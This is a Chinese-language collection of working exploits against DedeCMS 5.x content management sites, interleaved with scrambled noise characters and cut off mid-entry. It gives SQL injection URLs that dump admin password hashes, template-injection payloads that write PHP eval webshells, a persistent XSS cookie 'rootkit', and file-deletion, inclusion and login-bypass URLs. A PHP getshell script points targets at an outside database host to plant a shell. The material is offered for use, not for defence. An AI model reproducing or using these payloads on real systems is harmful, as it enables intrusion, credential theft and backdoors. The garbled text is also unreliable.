|
|
& ^. N" m# z4 M) N0 tDedecms 5.6 rss注入漏洞3 D8 ]3 k4 r, K0 ]- c9 t
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1% g4 l6 O( [$ f9 L6 j4 c
' q5 ]* ?* F% @% {/ a/ E& x: {+ Y$ V8 m
8 X$ a& `3 w0 e# \# `' {9 F7 I# q% t( B6 B, C0 i
; }& K* Z# l) i' R4 _* c! z
8 a! ^- z% [5 F/ S3 \
4 Z3 ^4 x2 h! _
! j1 v- E$ s7 ]. WDedeCms v5.6 嵌入恶意代码执行漏洞/ |0 j2 u$ f6 Y3 R4 b* o9 Y) `# j
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
$ s4 m* ^$ K S# _' i发表后查看或修改即可执行
, o( o2 V" z1 u L+ Ea{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
7 a) n/ l) g/ H5 q4 n生成x.php 密码xiao,直接生成一句话。4 m% j. t( s* M! N9 U7 p) M- @
: K8 D; W. @6 N+ u2 C7 t& @/ x& i* _
8 R# U) N8 o' {& x
+ _* f4 K% W' U( @3 x+ `
/ z8 R! {+ x0 ^/ c3 U5 {
/ b x3 U; y5 ~ x; _
4 M2 q- G# r* n1 L. G# _! g5 A6 n0 [3 Z7 v( {" \6 u' J( B
4 ~3 }/ H' v* n
Dede 5.6 GBK SQL注入漏洞
( _' W! U2 g" yhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';7 p9 C/ l5 q" o( P2 _: J7 y" v
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
$ t: E# m) L$ ]3 ~( v4 lhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 G! O' d' x; g/ `2 h& g4 f
+ ]4 \) b0 ^: b' T2 O
0 I2 {9 }8 X9 i# Q
* m5 \1 I, k( S1 }4 T* g/ ^% Y4 l
0 T/ B+ d0 g0 e8 v
: X$ J: k* e% v' o+ {
4 y5 @; R! R2 _! g0 i: Z: L) D
/ t4 y% M5 f' d1 T6 W9 e6 ?! u! f3 v+ x5 l
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞& }/ m) ^- a' w; d! S n
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ' r# y$ T* S* q6 N5 u% o1 H; S
# w6 h! t* }0 f6 ^
% T. f7 Z* T/ i
\0 t5 d- k7 q0 O- S6 U& T
4 V. w; @# w( P3 v! J. e
1 K6 a* m/ f9 ]6 `
8 q& b& Z! Q# E0 `. D& T( dDEDECMS 全版本 gotopage变量XSS漏洞
: `, a! w1 E) n0 B/ {8 r1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 3 ^7 h, _, z5 ?/ D5 t) a ]' d
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
' {! V3 s5 C0 G( M% j, h9 s M; q) G* U" l
/ Y$ e. G8 `& W9 g0 n
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
2 p% J( U' |0 t# h0 H5 ehttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda! z3 @% ^# P4 p: ?
& A( t) k6 C! R! {
' w; C3 z, f6 L+ o0 K* E
http://v57.demo.dedecms.com/dede/login.php9 \7 B' _0 @1 L" ~9 c
! n" a% I* B2 V7 {( T& e' o+ v4 H. t8 z" F% U* d) B8 x
color=Red]DeDeCMS(织梦)变量覆盖getshell5 b$ k# u% ?, f: l. [
#!usr/bin/php -w$ P% W' \0 k3 b" \. u1 @
<?php/ A- e# |( Y3 F- q2 ?
error_reporting(E_ERROR);$ x7 |, Q% w& V/ a. g& }
set_time_limit(0);
5 L; X% j# N- R( j+ zprint_r('
: i1 m! O) C! V' s7 k- U4 ^, C9 l9 kDEDEcms Variable Coverage
C" t X5 r; s7 m; l( u% S: U' IExploit Author: www.heixiaozi.comwww.webvul.com
% e) t& k' N" t9 @5 g, _);
; Q. _/ _0 v8 ^* M* Mecho "\r\n";
* H" _ ]0 o4 g6 ]7 ^/ \if($argv[2]==null){
9 O+ y+ ^7 `- j% ~! kprint_r('$ h, A! H% G% X5 }( Y3 J
+---------------------------------------------------------------------------+- Z% ]9 @/ _1 { N, z0 j
Usage: php '.$argv[0].' url aid path
$ G- V! K3 _+ R2 y9 e3 @aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
9 c. C8 j. x- D' H3 @ s; }Example:
. Q: t0 l* X7 ~/ J+ r6 @- n/ a5 Y0 ~php '.$argv[0].' www.site.com 1 old
\9 L: a& l: [ L+ {7 F5 P+---------------------------------------------------------------------------++ `( [9 m6 i9 _
');
7 j% t! ^7 R' \4 u$ t+ }exit;: X1 s5 h* ]4 W x% y
}; N3 C, j/ U Q. t1 s+ _
$url=$argv[1];
4 x, {9 i& \! G/ w2 ~! X( l$aid=$argv[2];
0 a( | H J- u& w! R$path=$argv[3];
! F* D! a& ^/ ]$exp=Getshell($url,$aid,$path);/ {3 Z a3 `+ L" P4 t% o9 {
if (strpos($exp,"OK")>12){8 r! V' @! ^& E0 [( Q6 [
echo "; G1 a" q# m5 C' |' S0 t
Exploit Success \n";
3 }% Q# m1 J# G' ?* C6 c/ I, d" hif($aid==1)echo "
% A$ e! u# e) F" xShell:".$url."/$path/data/cache/fuck.php\n" ;
: e1 S! S, r4 p. Y
9 h; m$ D1 f, b \' P' I0 _
, x. ~- W! G! I: q. L0 D* \9 pif($aid==2)echo "
) V' `; ], u' k1 D: ^" j5 K, [Shell:".$url."/$path/fuck.php\n" ;/ f2 d# _5 z& M
* c6 B3 ~" h+ ^ z) Q- Q& J
/ _3 V O3 Z, T/ \* C" b, o
if($aid==3)echo "$ v" G" s$ i: }+ J
Shell:".$url."/$path/plus/fuck.php\n";
0 F4 e( ] [. T2 X4 B6 t3 l$ V2 F
5 K+ Y5 k! u, z" }}else{& g# L, z" T$ E0 Q9 c
echo "
, N5 m- U& d+ Q3 G) [Exploit Failed \n";& M3 w8 t- t8 {0 }. } G; O% Z! j6 [
}
0 e$ v; j4 a) h5 Q G( ]function Getshell($url,$aid,$path){+ F5 s' c+ `' F+ K
$id=$aid;; \- l" `2 g7 o! g" \
$host=$url;
$ I: Z% m- U5 z. ?& p$port="80";
5 c& V6 T$ o, { v$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";0 k/ }8 v- g, V$ Q' z
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
7 F" M- |' u/ i0 g9 s8 P1 W& _' p$data .= "Host: ".$host."\r\n";
, a t0 j5 V' h+ d! ?$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
- @; W) I; q1 o/ ?' l7 W$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";1 {6 q7 T0 W( j$ Z0 W3 T1 [
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
' m' \' O' D: h1 m//$data .= "Accept-Encoding: gzip,deflate\r\n";! y3 N* G) f( T" W4 \' Y; q/ D4 }# Y% Z
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";5 j, \7 h+ T- O# l h) J
$data .= "Connection: keep-alive\r\n";
! q9 S* B+ q3 Q/ Y4 O2 @+ a8 i$data .= "Content-Type: application/x-www-form-urlencoded\r\n";8 f' g8 C/ a. e! \' ]# N# K
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
. U) A, F4 a8 _% |( k7 K$data .= $content."\r\n";
8 U% O |6 U: H/ e5 C+ B9 i q$ock=fsockopen($host,$port);
- ~4 F% V8 e2 O3 ~6 W4 d6 ^if (!$ock) {1 u3 f7 p3 T* j! J3 _* w- J1 R
echo "
% q4 k- J: \) y1 x- p9 xNo response from ".$host."\n";6 f, v2 b- n7 h% `
}! j' Q# E5 A2 ?/ n' f9 O9 Y
fwrite($ock,$data);
- O- X$ l9 [4 W$ n' Y" Bwhile (!feof($ock)) {
8 i/ n5 v9 a( |- f9 }2 L$exp=fgets($ock, 1024);
/ [' v: F8 [7 `, Z# v' Qreturn $exp;
7 n) Q0 i! g9 p$ g2 c. K8 \}
$ N! h" ]' _, L. B4 T5 r+ N6 {0 {}! N/ m, C% S. K5 H& j& ^
3 C! V6 e: k. c5 j; {
; `" o, G }' C+ i T?>5 \! ^, ^; ~+ [( c H5 q; j$ p
3 S1 R0 U- a% i1 j) o* V8 R
( s) q: j) g# q7 O$ k7 W5 w' C9 i+ P& ^' H5 N8 P' p5 d6 R* a; N0 U
3 E" c" O$ y, X$ l/ D G) ~0 |$ i* S- O
: ?; }4 g4 Z% p, u" {! v4 V
1 |, W# T4 t% X+ d2 D
]. w& _7 S6 a* k4 D
0 R$ Q* L0 {9 `6 w
' F1 ~% D6 {* Q) R4 r
- M5 t. }4 }0 Q( d0 ]DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
' U1 z& R5 j! q1 q( S4 Bhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
. Q" Z, _" s- b; L( Q U6 n! [+ C
' |# a+ e5 B$ m; z; Y8 ?/ }把上面validate=dcug改为当前的验证码,即可直接进入网站后台1 m3 T6 }' X1 q& `0 U
, X# A1 Z# u! H& p- u4 O
1 I2 I$ U' K. `
此漏洞的前提是必须得到后台路径才能实现6 S u$ w7 h4 Q* G1 ~- `
5 |% ]; @ [ _9 J) `. ?0 p& U" j
. R* u: k* F$ ~2 q* }+ j1 L# ^: h( i
& m8 A; K4 D( b* T, V _
, }$ V0 Y* t4 D \: n; [; s. d
( P3 |7 t: r6 J. C3 X
4 G$ v# x q8 q' z
( z# ]; x- n/ G. H
! m/ H6 b: \9 U6 l/ e1 x
$ V5 d3 Y: y5 O7 pDedecms织梦 标签远程文件写入漏洞
: K; t' s$ t4 M8 Y6 R5 T$ x前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
1 H2 J* `2 m0 f% M h) h7 f6 U! M( z; A$ T' n- {
3 Z- T5 o8 m/ D4 d D; C: G
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
2 d+ M: T. D' u: V3 l1 p7 e<form action="" method="post" name="QuickSearch" id="QuickSearch">, B: t; {5 O, X7 A: l
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />+ i- s' p% M$ V0 F1 K; F3 |+ Y5 H# Z
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />5 A( ?# Q7 Y* R" }$ p {7 Z& V" g. s
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />: V% B( D. s F/ x$ P
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />, o$ J" O8 W& v) {, s" ~; u2 j
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />. N4 r2 `1 M' x- i% a. V" H' ^
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />- o5 B/ g5 J% F0 _; B: Z
<input type="text" value="true" name="nocache" style="width:400">; I* ~" `4 u* P: z
<input type="submit" value="提交" name="QuickSearchBtn"><br />* ?, |, X+ }2 N2 P6 g* o% W2 \) t
</form>
5 t" O/ _% s. Q<script>
h' d" p! k: z$ @( ^function addaction()4 \ _7 R. B4 r0 d }, G
{& H7 q* ? y/ h% |+ _, B& [
document.QuickSearch.action=document.QuickSearch.doaction.value;$ }& X" `9 b' x+ O5 F% U
} b- M6 o# k4 R( ^+ b' R
</script>
5 h( T1 D$ x4 ^0 D
2 u! Q j0 r6 s" U* l6 H
; ?% `6 |/ J; O( e# Z( J9 \) \- D3 y
3 q* w) z S8 H& F: M: ~! F
# W2 C% ]6 R. b- b+ a- G% A
, p( h7 N, W' _
/ h- G5 A3 c# R% |/ \
$ A$ z1 x( B$ l9 Y
& o5 `( \2 i+ [2 U' X- a( Y# B& |5 A1 o+ K9 q, v
DedeCms v5.6 嵌入恶意代码执行漏洞, \/ A& k9 S- b& Z2 V; l, ]
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
1 e# h0 A7 }* R, ~$ ca{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}& g! H9 q a& b* U& A+ p( t4 C
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
- W) v; Y0 H* F9 V* t! cDedecms <= V5.6 Final模板执行漏洞$ b" |8 W& v3 I! u! a
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
& t: |3 g' H; N! G; iuploads/userup/2/12OMX04-15A.jpg6 m# p& D$ n* k9 A9 q3 i6 Q
x; b# y" ~7 T7 e
5 q n! i2 a( w模板内容是(如果限制图片格式,加gif89a):9 R$ P6 b0 h. u6 R- y" B
{dede:name runphp='yes'}
, x" T# G( a$ f1 p7 \$fp = @fopen("1.php", 'a');
* f8 a1 u3 F" k- c! c@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");5 j' J* x* `; S F: p3 S( l
@fclose($fp);* j7 q5 l1 P' D7 \
{/dede:name}) Z, b3 o; A6 o: |' x* Q! l7 `- n
2 修改刚刚发表的文章,查看源文件,构造一个表单:
% t6 X- _, f+ z/ K<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
2 q* f1 Q, a I7 e x( t0 A1 O<input type="hidden" name="dopost" value="save" />
5 a+ N- H2 b) c) \ y' o3 s<input type="hidden" name="aid" value="2" />% ]2 X* S5 I9 U$ z! e* l) S3 D+ {
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />1 ~9 f( L8 s4 k _* B) K8 x
<input type="hidden" name="channelid" value="1" />
5 q* M; Z5 p* D) j) m5 C<input type="hidden" name="oldlitpic" value="" />' N. T9 _' {( h/ r6 b H' P7 F
<input type="hidden" name="sortrank" value="1275972263" />/ c5 |5 n- I! K$ R. Q
' Q( @4 ?7 g2 \# ]( G" ^
3 V6 W1 v" q- p1 B$ w- q<div id="mainCp">
! a0 j) d1 s4 n. N9 N; D/ V<h3 class="meTitle"><strong>修改文章</strong></h3>& i9 n' o& O, ~4 c
5 W* A" P- E/ _4 F
[2 D+ D' @' N9 G<div class="postForm">
) i5 R' p( {$ L6 R5 J# l<label>标题:</label>
* x7 _" r5 _: [3 t( S$ L v<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>+ E* s6 \1 m1 y
+ L5 I8 V# z8 M0 I: x
, u& l M7 b/ Z" `" q6 `& O- A
<label>标签TAG:</label>- o8 z+ B, h' f7 I+ _1 p
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)' p b; c- c2 w9 b; o! O
; Q0 `" Y/ F K3 h0 g; h
& r5 |9 O1 `& F- ?0 W+ q! {0 }<label>作者:</label>" C1 M7 ~8 l; C* `
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/> ~6 x: N$ x8 f) p9 d" v$ z
& D: I0 E& [, g A( P) Q
N. A) b& n$ t1 n<label>隶属栏目:</label>8 }. U9 \) H' Y! S% G8 W: t
<select name='typeid' size='1'>$ R$ M1 d1 Q) M1 l% n
<option value='1' class='option3' selected=''>测试栏目</option>) I5 r9 L; W# r4 x7 U! j& j' {* `
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
" n# o6 z. j2 ~6 \2 ]( ^& V+ u" E: ?6 s: t: F
, O/ \8 }! y' @0 _ P<label>我的分类:</label>
5 V7 u$ q9 E+ b7 v; e9 B( ?<select name='mtypesid' size='1'>/ S" x0 L. N* U' ^
<option value='0' selected>请选择分类...</option>
. _4 y4 {* A) M+ p<option value='1' class='option3' selected>hahahha</option>3 h6 j+ s2 E0 R) o$ ?
</select>$ y+ W3 h7 b* B' ]9 }
' D5 K, v; Z2 U# ]4 B, P
@7 @# B w' u- A# u
<label>信息摘要:</label>
2 d3 `+ B! w L' T& |<textarea name="description" id="description">1111111</textarea>
# y7 _# c g3 `! E( B2 J& G(内容的简要说明)
8 o- x: T& I9 @! l$ U& B* x/ ?2 Z% O- R6 _
+ [$ B3 ]3 [9 s* ]) G! Q<label>缩略图:</label>; v3 l5 W- \# g6 O
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>' y4 _% K# B8 Y# H. l W
' P! S c# ~2 ^* C+ ~! a
# ]( d3 m( D$ R. Q9 u<input type='text' name='templet'
7 I G, i$ a) c" }value="../ uploads/userup/2/12OMX04-15A.jpg">
8 Z( P( B8 ]- W# B! Y' n<input type='text' name='dede_addonfields'# U9 O. c9 E3 h e/ v
value="templet,htmltext;">(这里构造)
$ ^0 \$ s- f+ g( ~) P* u</div>: L2 V* c8 i/ C
5 J2 h1 l9 o8 n# E% x, G) e
+ K/ Z; M# I1 e* S" c! y<!-- 表单操作区域 -->
7 a y0 {6 M, Y& @$ X% O5 a7 ?<h3 class="meTitle">详细内容</h3>% ^9 L$ c! m8 k0 Y# T1 a
1 T. |0 \; P5 L2 X0 R1 ?$ |/ Y! c
<div class="contentShow postForm">2 E/ n9 i, b+ g$ S- _
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
h4 A$ \, C; z c
4 F6 l7 U8 a2 m% h( K; H; s( P N8 g6 c6 j1 X, a
<label>验证码:</label>3 \" j' G5 I* y( m1 U8 ]
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
' B' M) R( S+ }8 x/ E5 t<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
& W; a7 _2 y( l# N& _! a
" h/ Z/ j- H0 T6 @/ J p/ T. D# G0 e% V* z& t
<button class="button2" type="submit">提交</button>3 {0 U# P, d, N- x/ N) I
<button class="button2 ml10" type="reset">重置</button>
; b& ]: \9 o* G; c& L</div>
' c$ N- l! c2 _* ?% v- K1 G* N4 H7 {6 \) r* H
6 K7 I; i; l& W( Z, v% s1 h</div>6 U1 F) ]# ?" l7 \) m% |" y# ?" E
7 W( i% |4 O" O' Z
1 e$ @6 D4 C- u% ]4 V
</form>
0 j' T: u: f0 J- b P! ~" m; {; Z+ X2 Y* b
u- W4 M0 F3 k2 }提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:3 ^3 ^- q* M8 L; Q, u0 Q! O
假设刚刚修改的文章的aid为2,则我们只需要访问:
8 ]! x8 J% u9 h; [, h1 T) ?http://127.0.0.1/dede/plus/view.php?aid=2
, ? a, G: C1 T# k( V即可以在plus目录下生成webshell:1.php) S* N2 w$ ~8 ]6 w! q: N. k
8 A( k) w, Q5 `4 z0 K, W5 F4 d1 v5 S9 w, t! S: b+ J
1 l; E8 |2 e5 \5 ^3 |8 C [' _' k
6 X% b- v* Q6 G, G1 P$ j3 A- W' `1 Y
' T4 X, o# H. r/ b7 p4 r
8 |2 `% g" W2 r/ u) m' G* \/ D' j
6 v$ ?; ^( ^: p# u; n# Z
8 \+ D1 j$ _3 A3 D$ E, T4 c9 H' Z ?, T/ o5 R6 {
], z2 p+ Y2 Y8 b$ J9 IDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
. i3 P% d. n: I8 hGif89a{dede:field name='toby57' runphp='yes'}
1 F+ e9 t, J0 z' Y" V4 _9 lphpinfo();
! H' h) e/ p6 I0 P& T{/dede:field}
: ^6 k; K1 O9 g2 g' j0 j保存为1.gif
4 {- F" y$ W% b' ^<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
+ N" j3 m8 W8 ~" b% S4 ]) Z<input type="hidden" name="aid" value="7" /> + g2 s$ [. J* ^4 \! L. w0 J) ^
<input type="hidden" name="mediatype" value="1" /> 0 K, R, k" Z1 O( f' k3 x
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
$ n! b1 Q' T6 o) i. D$ F( J& s<input type="hidden" name="dopost" value="save" />
2 `# i2 S# I6 p1 \: n<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
8 ^7 ^9 H: U' s$ h; ?0 b$ Y1 O<input name="addonfile" type="file" id="addonfile"/>
4 j5 }+ a8 v4 x* v, e" l. ]<button class="button2" type="submit" >更改</button>
" B) D' o+ v& N' j</form> 7 E. Z! W( C' K, Y7 u4 K
9 n3 S6 ^& W: Z; D% g3 x
! S( t; r8 O+ m$ M& w, g
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif% B/ h- E5 H1 K. ?% \8 Y7 A! k( T% g
发表文章,然后构造修改表单如下:
6 ?' h1 n; |, j% ?! O7 q0 [% H; X# h+ \: j5 l
* E9 d5 Z# v2 S& h' h8 y
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 0 E2 v: o' `+ b& ]2 q
<input type="hidden" name="dopost" value="save" /> - b' A5 j3 {* K, W& L3 R
<input type="hidden" name="aid" value="2" />
! o' k/ e5 D5 u( R" z<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
& I& T1 \% ^4 u1 F- b<input type="hidden" name="channelid" value="1" /> ( G9 ^0 o& X6 P1 ?5 u
<input type="hidden" name="oldlitpic" value="" /> # ^- u' ^1 b, r9 A4 q6 H
<input type="hidden" name="sortrank" value="1282049150" /> / X1 r9 ?1 P& o& x' ^
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
1 }, W- J6 e" D0 ]% D2 i/ }<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
' y3 l" H. g% O5 T- f9 y* t3 M<select name='typeid' size='1'>
* P9 D7 K8 C! X: D<option value='1' class='option3' selected=''>Test</option> _9 U; R4 W- L+ G3 B7 p1 M7 g* P; ]
<select name='mtypesid' size='1'>
# h2 l8 J0 z0 f1 u<option value='0' selected>请选择分类...</option> - Q3 r4 I5 g! L3 G
<option value='1' class='option3' selected>aa</option></select> 8 J. Y, r+ o* V0 p0 Z
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
+ P$ f) l2 }9 n1 M* B<input type='hidden' name='dede_addonfields' value="templet"> 6 o, ?; d9 A; X6 l
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> . U q: M$ z: D1 `/ C! L
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> + C; E; ?/ s9 }9 |; u
<button class="button2" type="submit">提交</button>
$ B& b4 c. p! B5 A1 H+ J5 S* p</form>
1 s+ M5 I1 \( J% ?- K4 d [* ~! S8 Q4 L+ v
# W( F! F' i u! Y1 A: I2 }( ?/ G3 L& \ h
9 ^3 l3 B4 _! w6 d. H" Y
2 f: e( O. ?1 L$ T$ {4 m# u5 y% z" P- _9 m& ]
: _( S3 e; `( z0 N j( H% H2 B1 _
7 _" r3 s. P$ i" F
8 l# P$ B( _. ]4 d7 W5 w! Q: R4 F1 Q9 ~ J8 e6 V3 B
) G, D( C; n8 [7 n4 N5 G5 [
, m, F8 c7 b7 C织梦(Dedecms)V5.6 远程文件删除漏洞
2 x5 J8 r0 f2 J& jhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif8 P( @5 `* p3 u7 k0 `! K/ P
; L) W. S3 _- j) G. d
$ w) d8 @9 B g% E8 L( n9 e4 I4 Y
0 V1 w! D0 ^; u; x
/ @4 K- X- B( L" F5 q) s+ I) M+ M6 A
/ E. q: \0 j- d7 j; U4 u( l) r' A, j7 ^6 a& Q3 C
; B1 T/ I+ T4 _. C z
/ X- ?8 \1 Q% B2 k, V- n9 Z- f- p% U; t0 s7 V1 C% s; O- ^' Q
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
; E. `+ ?4 Z7 Chttp://www.test.com/plus/carbuya ... urn&code=../../
! i# X; A5 M- k" g& Q) ^' h
5 z- y7 U1 | a& Z/ V) ]! Z) _5 C) N6 J6 y% m2 t2 R
+ N* V2 F0 N1 D! S3 [% M6 x
8 l% L; O* [' o! u. W
3 v9 B& R+ b4 ]/ \7 j0 [
4 L. u1 K" b6 w6 f, D' B l
3 s$ o+ T* c& `& V
# V8 K8 H& x* ]1 a* H6 X) T
) Q2 ~& [6 t2 L/ x6 t( n- O: z2 g% E5 p9 v6 S
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 & o1 r* ~! [' l
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 ?3 Y) M4 L3 c密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5# K' f& k5 F: [) C6 g
- D( o' }- ~" y% U( t' O' J0 R' a
; A: ?1 M( X$ N' I( o% S
' E* u, U) W! o" m( u
: A* ?1 _* W* o% T
J5 E$ L) B: `. d2 W9 c
6 Z! J% A/ p6 T1 \! K* h
. _, t" ^' |, ^ C1 W" H0 N- K7 X8 }% M6 d& b
$ t. }1 L* R0 p4 O
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞' v- U9 K- f( R8 U. c: p) p0 I
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='" h7 z# j7 y( k! \/ `6 {3 o T" |3 t
# T1 ]5 x- O. I7 M
% t& A' e' ]! L' K0 [
, m- {4 H0 B( K1 {
% G" E6 F/ s7 o/ |# j k
" P- k2 c7 y) X2 A" m
) G7 ~+ z" k" d3 K5 B
( V! S/ H/ I$ E; i* A6 u& X4 R$ l( {
A* Q" T+ ], i3 L
$ }! b: f K2 y6 d# k
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
4 Z) U, T% b: l<html>9 Z/ b: x( Y8 K% p
<head>! i% E7 X1 J& f0 A
